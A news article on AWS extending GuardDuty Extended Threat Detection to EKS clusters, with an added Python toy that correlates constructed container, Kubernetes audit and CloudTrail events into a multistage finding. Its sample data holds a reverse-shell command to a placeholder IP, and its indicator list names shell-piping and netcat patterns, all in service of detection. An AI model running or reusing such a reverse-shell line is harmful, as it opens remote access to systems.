AWS Expands Threat Detection Features For Large-Scale Cloud Applications

JAKARTA - Amazon Web Services (AWS) announced that Amazon GuardDuty Extended Threat Detection now covers Amazon Elastic Kubernetes Service (Amazon EKS).

The feature builds on the capability introduced at AWS re:Invent 2024, namely AI/ML-based threat detection intended to improve cloud security.

The service is designed to help security teams detect complex, multistage attacks against modern container-based applications, which are widely used by large enterprises.

Systems such as Amazon EKS are often used to manage applications spread across many cloud servers. The distributed nature of such systems, however, exposes them to multistage attacks: exploiting vulnerabilities in containers, escalating privileges, and then moving laterally through the cloud infrastructure without being noticed.

Traditional monitoring approaches may detect suspicious events individually, but they often fail to capture the broader attack pattern that unfolds across multiple data sources and over longer time spans, AWS said.

To that end, GuardDuty Extended Threat Detection automatically combines and analyzes data from multiple sources, such as Kubernetes audit logs, runtime process behavior, malware execution, and AWS API activity.

Using AWS's correlation algorithms, the service can recognize a suspicious sequence of individually low-signal actions as a single attack sequence.

For example, an attacker can exploit a containerized application, obtain the credentials of its Kubernetes service account, and then use the permissions tied to that identity to access confidential data or critical resources in the cloud.
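To make the correlation idea concrete, the following is an added toy example, written for this article and not GuardDuty's own algorithm, data format or findings schema. It chains three constructed event streams (runtime process behaviour in a pod, Kubernetes audit log entries, and CloudTrail API calls) by identity and time: a suspicious process in a pod, followed within a window by a sensitive API-server request from that pod's service account, followed by a sensitive AWS API call by the IAM role that service account can assume. The service-account-to-role mapping, the indicator lists, the time window and all sample events are assumptions constructed for the example.

```python
"""Toy multistage correlation over constructed EKS/runtime/CloudTrail events.

Added illustration only: not GuardDuty's algorithm or data model. Every field
name, the IRSA mapping, the indicator lists and the sample events are
constructed assumptions for this example.
"""
from datetime import datetime, timedelta, timezone

# Assumed IRSA binding: Kubernetes service account -> IAM role it can assume.
# This is the pivot from cluster identity to cloud identity.
SERVICE_ACCOUNT_TO_ROLE = {
    "prod/payments-sa": "arn:aws:iam::111122223333:role/payments-app-role",
}

WINDOW = timedelta(hours=2)  # assumed maximum span of one attack sequence

# Constructed indicator lists (stand-ins for real detection content).
SUSPICIOUS_PROC = ("/dev/tcp/", "nc -e", "curl | sh")
SENSITIVE_K8S = {("list", "secrets"), ("get", "secrets"), ("create", "pods")}
SENSITIVE_API = {"GetObject", "GetSecretValue", "CreateAccessKey"}

# Constructed sample events: three sources, one real attack path plus noise.
RUNTIME_EVENTS = [  # process behaviour reported by an in-pod runtime agent
    {"time": "2025-06-01T10:00:05", "pod": "prod/payments-7c9d",
     "proc": "bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"},
    {"time": "2025-06-01T09:10:00", "pod": "prod/web-1a2b",
     "proc": "nginx -g 'daemon off;'"},
]
EKS_AUDIT_EVENTS = [  # kube-apiserver audit log
    {"time": "2025-06-01T10:03:10",
     "user": "system:serviceaccount:prod:payments-sa",
     "pod": "prod/payments-7c9d", "verb": "list", "resource": "secrets"},
]
CLOUDTRAIL_EVENTS = [  # AWS API activity
    {"time": "2025-06-01T10:07:42",
     "role": "arn:aws:iam::111122223333:role/payments-app-role",
     "eventName": "GetObject", "bucket": "customer-pii-exports",
     "sourceIP": "203.0.113.9"},
    {"time": "2025-06-01T08:00:00",  # normal traffic, outside the window
     "role": "arn:aws:iam::111122223333:role/payments-app-role",
     "eventName": "GetObject", "bucket": "app-config", "sourceIP": "10.0.1.5"},
]


def _ts(s):
    """Parse the constructed ISO-8601 timestamps as UTC."""
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


def correlate(runtime, audit, cloudtrail):
    """Link exploit -> service-account abuse -> cloud API access.

    Stage 1: a suspicious process in a pod.
    Stage 2: a sensitive API-server request from that pod's service account,
             after stage 1 and inside WINDOW.
    Stage 3: a sensitive AWS API call by the role mapped to that service
             account, after stage 2 and still inside WINDOW.
    Each stage alone is only a weak signal; the chain is the finding.
    """
    findings = []
    for r in runtime:
        indicators = [i for i in SUSPICIOUS_PROC if i in r["proc"]]
        if not indicators:
            continue
        t0 = _ts(r["time"])
        deadline = t0 + WINDOW
        for a in audit:
            t1 = _ts(a["time"])
            if a["pod"] != r["pod"] or (a["verb"], a["resource"]) not in SENSITIVE_K8S:
                continue
            if not t0 <= t1 <= deadline:
                continue
            # "system:serviceaccount:<namespace>:<name>" -> "<namespace>/<name>"
            _, ns, name = a["user"].split(":")[1:]
            sa = f"{ns}/{name}"
            role = SERVICE_ACCOUNT_TO_ROLE.get(sa)
            for c in cloudtrail:
                t2 = _ts(c["time"])
                if c["role"] != role or c["eventName"] not in SENSITIVE_API:
                    continue
                if not t1 <= t2 <= deadline:
                    continue
                findings.append({
                    "severity": "HIGH",
                    "stages": ["container exploit", "service account abuse",
                               "cloud API access"],
                    "resources": {"pod": r["pod"], "service_account": sa,
                                  "role": role, "target": c["bucket"]},
                    "timeline": [(r["time"], r["proc"]),
                                 (a["time"], f'{a["verb"]} {a["resource"]}'),
                                 (c["time"], c["eventName"])],
                    "actor": {"source_ip": c["sourceIP"]},
                    "indicators": indicators,
                })
    return findings


if __name__ == "__main__":
    for f in correlate(RUNTIME_EVENTS, EKS_AUDIT_EVENTS, CLOUDTRAIL_EVENTS):
        print(f)
```

Run on the constructed input, the code emits exactly one finding: the reverse shell in `prod/payments-7c9d`, the `list secrets` request by `payments-sa`, and the `GetObject` on `customer-pii-exports` by the mapped role, with the shared source IP as the actor. The benign nginx process and the earlier `GetObject` from an internal address are not chained, and moving the final API call outside the window breaks the chain, which is the point the article makes about per-event monitoring missing the pattern.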

Each detected finding is delivered with detailed context, including the affected resources, a timeline of the events, the actors involved, and the technical indicators observed.

The service also provides mitigation recommendations based on AWS best practices, to help organizations respond to threats quickly and accurately.